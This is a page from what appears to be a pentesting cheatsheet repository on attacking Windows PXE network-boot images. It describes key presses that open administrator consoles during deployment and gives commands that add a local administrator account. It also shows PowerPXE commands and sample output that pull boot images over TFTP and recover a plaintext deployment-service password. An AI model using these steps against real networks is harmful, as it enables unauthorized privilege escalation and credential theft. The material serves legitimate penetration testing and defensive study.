daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

internal-pxe-boot-image.md (2775B)


      1 ---
      2 title: "Internal - PXE Boot Image"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/internal-pxe-boot-image.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-pxe-boot-image.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Internal - PXE Boot Image
     12 
     13 PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.
     14 
     15 - Press **[F8]** during the PXE boot to spawn an administrator console on the deployed machine.
     16 - Press **[SHIFT+F10]** during the initial Windows setup process to bring up a system console, then add a local administrator or dump SAM/SYSTEM registry.
     17 
     18     ```powershell
     19     net user hacker Password123! /add
     20     net localgroup administrators /add hacker
     21     ```
     22 
     23 - Extract the pre-boot image (wim files) using [PowerPXE.ps1 (https://github.com/wavestone-cdt/powerpxe)](https://github.com/wavestone-cdt/powerpxe) and dig through it to find default passwords and domain accounts.
     24 
     25     ```powershell
     26     # Import the module
     27     PS > Import-Module .\PowerPXE.ps1
     28 
     29     # Start the exploit on the Ethernet interface
     30     PS > Get-PXEcreds -InterfaceAlias Ethernet
     31     PS > Get-PXECreds -InterfaceAlias « lab 0 » 
     32 
     33     # Wait for the DHCP to get an address
     34     >> Get a valid IP address
     35     >>> >>> DHCP proposal IP address: 192.168.22.101
     36     >>> >>> DHCP Validation: DHCPACK
     37     >>> >>> IP address configured: 192.168.22.101
     38 
     39     # Extract BCD path from the DHCP response
     40     >> Request BCD File path
     41     >>> >>> BCD File path:  \Tmp\x86x64{5AF4E332-C90A-4015-9BA2-F8A7C9FF04E6}.bcd
     42     >>> >>> TFTP IP Address:  192.168.22.3
     43 
     44     # Download the BCD file and extract wim files
     45     >> Launch TFTP download
     46     >>>> Transfer succeeded.
     47     >> Parse the BCD file: conf.bcd
     48     >>>> Identify wim file : \Boot\x86\Images\LiteTouchPE_x86.wim
     49     >>>> Identify wim file : \Boot\x64\Images\LiteTouchPE_x64.wim
     50     >> Launch TFTP download
     51     >>>> Transfer succeeded.
     52 
     53     # Parse wim files to find interesting data
     54     >> Open LiteTouchPE_x86.wim
     55     >>>> Finding Bootstrap.ini
     56     >>>> >>>> DeployRoot = \\LAB-MDT\DeploymentShare$
     57     >>>> >>>> UserID = MdtService
     58     >>>> >>>> UserPassword = Somepass1
     59     ```
     60 
     61 ## References
     62 
     63 - [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/)
     64 - [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE)